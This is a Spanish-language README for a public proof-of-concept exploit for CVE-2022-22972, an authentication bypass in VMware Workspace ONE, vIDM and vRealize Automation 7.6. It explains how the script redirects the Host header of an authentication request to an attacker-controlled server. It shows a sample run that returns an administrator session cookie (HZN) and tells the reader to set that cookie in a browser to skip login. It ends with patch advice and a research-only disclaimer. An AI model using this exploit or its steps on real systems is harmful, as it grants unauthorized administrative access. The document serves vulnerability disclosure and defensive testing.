
Exploit de prueba de concepto para CVE-2022-22972 que elude la autenticación en VMware Workspace ONE, vIDM y vRealize Automation 7.6 mediante la manipulación del encabezado Host.
POC para CVE-2022-22972 que afecta a VMware Workspace ONE, vIDM y vRealize Automation 7.6.
Un análisis técnico de la causa raíz de la vulnerabilidad se puede encontrar en nuestro blog: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
Este script puede ser utilizado para evitar la autenticación en vRealize Automation 7.6 usando CVE-2022-22972. Workspace ONE y vIDM tienen diferentes endpoints de autenticación, pero el núcleo de la vulnerabilidad sigue siendo el mismo. Estamos encantados de aceptar pull requests si tienes artículos de prueba para verificar el flujo.
Este script funciona cambiando la cabecera Host de una solicitud HTTP POST de un endpoint de autenticación de VMware a un Host controlado por un atacante. Esto hace que la aplicación VMware se comunique con el Host con información de credenciales y si el Host devuelve 200, el usuario se autentica correctamente.
Este script produce una cookie HZN que puede incluirse en solicitudes posteriores para realizar acciones como el usuario comprometido.
NOTA: Los argumentos predeterminados del script enviarán la solicitud de autenticación a nuestra puerta de enlace de AWS API que está configurada para responder con un 200 para el endpoint específico mencionado en el blog. Puedes cambiar esto con la opción --host. Este endpoint no recibirá ningún dato sensible durante el flujo de explotación, solo una solicitud de la aplicación vulnerable con el encabezado de autenticación falso al que responde.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Establece la cookie HZN en tu navegador para evitar la autenticación
Actualiza a la última versión o mitiga siguiendo las instrucciones en el VMSA
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto donde se autorice explícitamente. Los mantenedores del proyecto no son responsables ni se hacen responsables del uso indebido del software. Úselo responsablemente.